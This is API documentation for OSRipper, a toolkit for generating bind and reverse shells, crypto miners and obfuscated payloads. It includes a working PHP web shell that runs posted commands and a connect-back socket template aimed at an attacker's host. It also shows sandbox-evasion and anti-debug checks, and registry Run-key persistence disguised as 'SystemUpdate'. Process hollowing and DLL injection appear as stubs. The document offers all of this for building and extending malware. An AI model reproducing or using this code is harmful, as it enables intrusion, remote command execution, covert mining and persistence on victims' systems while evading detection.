This document provides comprehensive API documentation for OSRipper v0.4.2, enabling developers to integrate and extend the framework.
- Core Classes
- Configuration API
- Logging API
- Payload Generation
- Obfuscation Engine
- CLI Integration
- Extension Development
Main configuration management class.
from config import OSRipperConfig
# Initialize with defaults
config = OSRipperConfig()
# Generate random variables for obfuscation
random_vars = config.generate_random_variables()
# Generate random string
random_string = config.generate_random_string(16)| Method | Description | Parameters | Returns |
|---|---|---|---|
generate_random_variables() |
Generate randomization values | None | Dict[str, Any] |
generate_random_string(length) |
Generate random string | length: int |
str |
| Property | Type | Description |
|---|---|---|
bind_mode |
bool |
Enable bind mode |
encrypted |
bool |
Encryption status |
host |
Optional[str] |
Target host |
port |
Optional[str] |
Target port |
name |
str |
Output filename |
output_dir |
Path |
Output directory |
Main payload generation engine.
from main import PayloadGenerator, OSRipperConfig
config = OSRipperConfig()
generator = PayloadGenerator(config)
# Display logo
generator.display_logo()
# Validate input
valid_port = generator.validate_port("4444")
valid_ip = generator.validate_ip("192.168.1.100")| Method | Description | Parameters | Returns |
|---|---|---|---|
display_logo() |
Show ASCII art logo | None | None |
validate_port(port) |
Validate port number | port: str |
bool |
validate_ip(ip) |
Validate IP address | ip: str |
bool |
generate_bind_backdoor() |
Create bind shell | None | None |
generate_reverse_tcp_meterpreter() |
Create reverse shell | None | None |
generate_btc_miner() |
Create crypto miner | None | None |
Advanced configuration management with YAML/JSON support.
from config import ConfigManager
# Initialize with config file
config = ConfigManager("osripper.yml")
# Get configuration values
output_dir = config.get("general.output_dir", "dist")
obfuscate = config.get("payload.auto_obfuscate", True)
# Set configuration values
config.set("network.default_port", 4444)
# Save configuration
config.save_config()| Method | Description | Parameters | Returns |
|---|---|---|---|
load_config() |
Load config from file | None | bool |
save_config(file_path) |
Save config to file | file_path: Optional[str] |
bool |
get(key, default) |
Get config value | key: str, default: Any |
Any |
set(key, value) |
Set config value | key: str, value: Any |
None |
validate_config() |
Validate configuration | None | bool |
create_sample_config(path) |
Create sample config | path: str |
bool |
# Get section-specific configs
payload_config = config.get_payload_config()
network_config = config.get_network_config()
compilation_config = config.get_compilation_config()
evasion_config = config.get_evasion_config()from config import ConfigManager
# Load configuration
config = ConfigManager("custom.yml")
# Payload settings
payload_settings = {
'name': config.get('payload.default_name', 'backdoor'),
'obfuscate': config.get('payload.auto_obfuscate', True),
'layers': config.get('payload.obfuscation_layers', 5)
}
# Network settings
network_settings = {
'host': config.get('network.default_host', 'localhost'),
'port_range': config.get('network.default_port_range', [4444, 8888]),
'ssl': config.get('network.use_ssl', True)
}
# Apply settings
if payload_settings['obfuscate']:
apply_obfuscation(payload_settings['layers'])Advanced logging system with multiple handlers.
from logger import OSRipperLogger, get_logger, log_operation
# Get global logger instance
logger = get_logger()
# Basic logging
logger.info("Operation started")
logger.error("Operation failed", error_code=500)
# Specialized logging
logger.payload_generated("reverse_tcp", "192.168.1.100:4444")
logger.connection_established("192.168.1.100", 4444)
logger.security_event("vm_detection", "VirtualBox detected")| Method | Description | Parameters | Returns |
|---|---|---|---|
info(message, **kwargs) |
Log info message | message: str, **kwargs |
None |
error(message, **kwargs) |
Log error message | message: str, **kwargs |
None |
warning(message, **kwargs) |
Log warning message | message: str, **kwargs |
None |
payload_generated(type, target, **kwargs) |
Log payload creation | type: str, target: str |
None |
connection_attempt(host, port, **kwargs) |
Log connection attempt | host: str, port: int |
None |
security_event(event, details, **kwargs) |
Log security events | event: str, details: str |
None |
from logger import log_operation
@log_operation("payload_generation", payload_type="reverse_tcp")
def generate_payload(host, port):
# Payload generation logic
return create_reverse_payload(host, port)
# Usage
payload = generate_payload("192.168.1.100", 4444)from logger import OperationLogger, get_logger
logger = get_logger()
with OperationLogger(logger, "compilation", compiler="nuitka"):
compile_payload("payload.py")
# Automatically logs start/completion/failurefrom main import (
gen_bind, gen_rev_ssl_tcp, gen_custom,
gen_btc_miner, validate_port, validate_ip
)
# Input validation
if validate_port("4444") and validate_ip("192.168.1.100"):
# Generate reverse shell
gen_rev_ssl_tcp()Create custom payload generators:
def generate_custom_payload(config):
"""Generate custom payload with specific requirements."""
# Validate configuration
if not config.host or not config.port:
raise ValueError("Host and port required")
# Generate payload template
payload_template = f"""
import socket
import ssl
import base64
import zlib
def connect_back():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('{config.host}', {config.port}))
if {config.use_ssl}:
s = ssl.wrap_socket(s)
# Custom payload logic here
execute_commands(s)
except Exception:
pass
def execute_commands(socket):
# Command execution logic
pass
if __name__ == "__main__":
connect_back()
"""
# Apply obfuscation if enabled
if config.obfuscate:
payload_template = apply_obfuscation(payload_template)
# Write to file
with open(config.output_file, 'w') as f:
f.write(payload_template)
return config.output_fileDefine reusable payload templates:
PAYLOAD_TEMPLATES = {
'reverse_tcp': """
import socket
import ssl
import struct
import {imports}
{anti_debug_code}
def main():
{connection_code}
{execution_code}
if __name__ == "__main__":
main()
""",
'bind_tcp': """
import socket
import struct
import {imports}
{anti_vm_code}
def main():
{bind_code}
{execution_code}
if __name__ == "__main__":
main()
""",
'miner': """
import socket
import json
import hashlib
import {imports}
{stealth_code}
def mine():
{mining_code}
if __name__ == "__main__":
mine()
"""
}
def generate_from_template(template_name, **kwargs):
"""Generate payload from template."""
template = PAYLOAD_TEMPLATES[template_name]
return template.format(**kwargs)Multi-layer obfuscation system.
from osripper.obfuscator_enhanced import AdvancedObfuscator
# Initialize obfuscator
obfuscator = AdvancedObfuscator()
# Obfuscate file
success = obfuscator.obfuscate_file("input.py", "output.py")
if success:
print("Obfuscation completed successfully")| Method | Description | Parameters | Returns |
|---|---|---|---|
obfuscate_file(input, output) |
Obfuscate Python file | input: str, output: str |
bool |
add_anti_debug(code) |
Add anti-debug code | code: str |
str |
add_vm_detection(code) |
Add VM detection | code: str |
str |
obfuscate_strings(code) |
Obfuscate string literals | code: str |
str |
add_junk_code(code) |
Add junk code | code: str |
str |
from osripper.obfuscator_enhanced import AdvancedObfuscator
class CustomObfuscator(AdvancedObfuscator):
def add_custom_evasion(self, code):
"""Add custom evasion techniques."""
custom_evasion = """
# Custom anti-analysis code
import time
import random
def check_environment():
# Custom environment checks
start_time = time.time()
# Perform dummy operations
for i in range(1000):
random.randint(1, 100)
# Check execution time
if time.time() - start_time < 0.1:
exit(0) # Likely running in sandbox
check_environment()
"""
return custom_evasion + code
def obfuscate_file(self, input_file, output_file):
# Read input
with open(input_file, 'r') as f:
code = f.read()
# Apply custom evasion
code = self.add_custom_evasion(code)
# Apply standard obfuscation
return super().obfuscate_file_content(code, output_file)
# Usage
custom_obfuscator = CustomObfuscator()
custom_obfuscator.obfuscate_file("payload.py", "obfuscated.py")from osripper.obfuscator_enhanced import AdvancedObfuscator
obfuscator = AdvancedObfuscator()
# Multi-layer encoding
encoded = obfuscator.encode_with_multiple_layers("print('hello')", layers=5)
# Create dynamic loader
loader = obfuscator.create_dynamic_loader(encoded)
# Write final payload
with open("final_payload.py", 'w') as f:
f.write(loader)from cli import create_parser, validate_args, execute_bind
# Create parser
parser = create_parser()
# Parse arguments
args = parser.parse_args(['bind', '-p', '4444', '--obfuscate'])
# Validate arguments
if validate_args(args):
# Execute command
success = execute_bind(args)Extend the CLI with custom commands:
def add_custom_command(subparsers):
"""Add custom command to CLI."""
custom_parser = subparsers.add_parser('custom', help='Custom payload')
custom_parser.add_argument('--type', required=True, choices=['web', 'mobile'])
custom_parser.add_argument('--target', required=True)
return custom_parser
def execute_custom(args):
"""Execute custom command."""
if args.type == 'web':
return generate_web_payload(args.target)
elif args.type == 'mobile':
return generate_mobile_payload(args.target)
return False
# Integration example
def main_cli_extended():
parser = create_parser()
subparsers = parser._subparsers._group_actions[0]
# Add custom command
add_custom_command(subparsers)
args = parser.parse_args()
if args.command == 'custom':
return execute_custom(args)
# Handle standard commands
return handle_standard_commands(args)Create plugins for OSRipper:
class OSRipperPlugin:
"""Base class for OSRipper plugins."""
def __init__(self, name, version):
self.name = name
self.version = version
def initialize(self, config):
"""Initialize plugin with configuration."""
pass
def generate_payload(self, **kwargs):
"""Generate payload (override in subclass)."""
raise NotImplementedError
def post_process(self, payload_file):
"""Post-process generated payload."""
return payload_file
class WebShellPlugin(OSRipperPlugin):
"""Web shell payload plugin."""
def __init__(self):
super().__init__("WebShell", "1.0")
def generate_payload(self, language="php", **kwargs):
"""Generate web shell payload."""
if language == "php":
return self._generate_php_shell(**kwargs)
elif language == "jsp":
return self._generate_jsp_shell(**kwargs)
else:
raise ValueError(f"Unsupported language: {language}")
def _generate_php_shell(self, **kwargs):
"""Generate PHP web shell."""
php_shell = """<?php
if(isset($_POST['cmd'])){
echo "<pre>";
$cmd = ($_POST['cmd']);
system($cmd);
echo "</pre>";
}
?>
<form method="post">
<input type="text" name="cmd" placeholder="Command">
<input type="submit" value="Execute">
</form>"""
return php_shell
# Plugin registration
PLUGINS = {
'webshell': WebShellPlugin(),
# Add more plugins here
}
def load_plugin(name):
"""Load plugin by name."""
if name in PLUGINS:
return PLUGINS[name]
else:
raise ValueError(f"Plugin not found: {name}")
# Usage
webshell_plugin = load_plugin('webshell')
php_payload = webshell_plugin.generate_payload(language="php")Implement custom evasion methods:
class EvasionTechniques:
"""Custom evasion technique implementations."""
@staticmethod
def add_process_hollowing(code):
"""Add process hollowing technique."""
hollowing_code = """
import subprocess
import os
def hollow_process():
# Create suspended process
proc = subprocess.Popen(['notepad.exe'],
creationflags=0x00000004) # CREATE_SUSPENDED
# Hollow and inject code
# Implementation details...
return proc
# Execute in hollow process
hollow_process()
"""
return hollowing_code + code
@staticmethod
def add_dll_injection(code):
"""Add DLL injection technique."""
injection_code = """
import ctypes
from ctypes import wintypes
def inject_dll(process_id, dll_path):
# Open target process
process = ctypes.windll.kernel32.OpenProcess(
0x1F0FFF, False, process_id)
# Allocate memory and inject DLL
# Implementation details...
return True
# Perform DLL injection
inject_dll(target_pid, "payload.dll")
"""
return injection_code + code
@staticmethod
def add_registry_persistence(code):
"""Add registry persistence."""
persistence_code = """
import winreg
def add_persistence(exe_path):
key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, winreg.KEY_SET_VALUE)
winreg.SetValueEx(key, "SystemUpdate", 0,
winreg.REG_SZ, exe_path)
winreg.CloseKey(key)
# Add to startup
add_persistence(__file__)
"""
return persistence_code + code
# Usage in obfuscator
def apply_advanced_evasion(code, techniques):
"""Apply advanced evasion techniques."""
evasion = EvasionTechniques()
if 'process_hollowing' in techniques:
code = evasion.add_process_hollowing(code)
if 'dll_injection' in techniques:
code = evasion.add_dll_injection(code)
if 'registry_persistence' in techniques:
code = evasion.add_registry_persistence(code)
return codeComplete integration example:
from config import ConfigManager
from logger import get_logger
from osripper.obfuscator_enhanced import AdvancedObfuscator
class CustomPayloadGenerator:
"""Custom payload generator with full integration."""
def __init__(self, config_file=None):
self.config = ConfigManager(config_file)
self.logger = get_logger()
self.obfuscator = AdvancedObfuscator()
def generate(self, payload_type, **kwargs):
"""Generate payload with full integration."""
# Log operation start
self.logger.operation_start("payload_generation",
payload_type=payload_type)
try:
# Generate base payload
if payload_type == "reverse_tcp":
payload = self._generate_reverse_tcp(**kwargs)
elif payload_type == "web_shell":
payload = self._generate_web_shell(**kwargs)
else:
raise ValueError(f"Unsupported payload type: {payload_type}")
# Apply obfuscation if configured
if self.config.get("payload.auto_obfuscate", True):
layers = self.config.get("payload.obfuscation_layers", 5)
payload = self._apply_obfuscation(payload, layers)
# Save payload
output_file = self._save_payload(payload, **kwargs)
# Log success
self.logger.payload_generated(payload_type, output_file)
self.logger.operation_complete("payload_generation")
return output_file
except Exception as e:
self.logger.operation_failed("payload_generation", str(e))
raise
def _generate_reverse_tcp(self, host, port, **kwargs):
"""Generate reverse TCP payload."""
# Implementation
pass
def _apply_obfuscation(self, payload, layers):
"""Apply obfuscation with specified layers."""
# Implementation
pass
def _save_payload(self, payload, **kwargs):
"""Save payload to file."""
# Implementation
pass
# Usage
generator = CustomPayloadGenerator("custom.yml")
payload_file = generator.generate("reverse_tcp",
host="192.168.1.100",
port=4444)This completes the comprehensive API documentation for OSRipper v0.4.2. The API provides extensive customization and extension capabilities for advanced users and developers.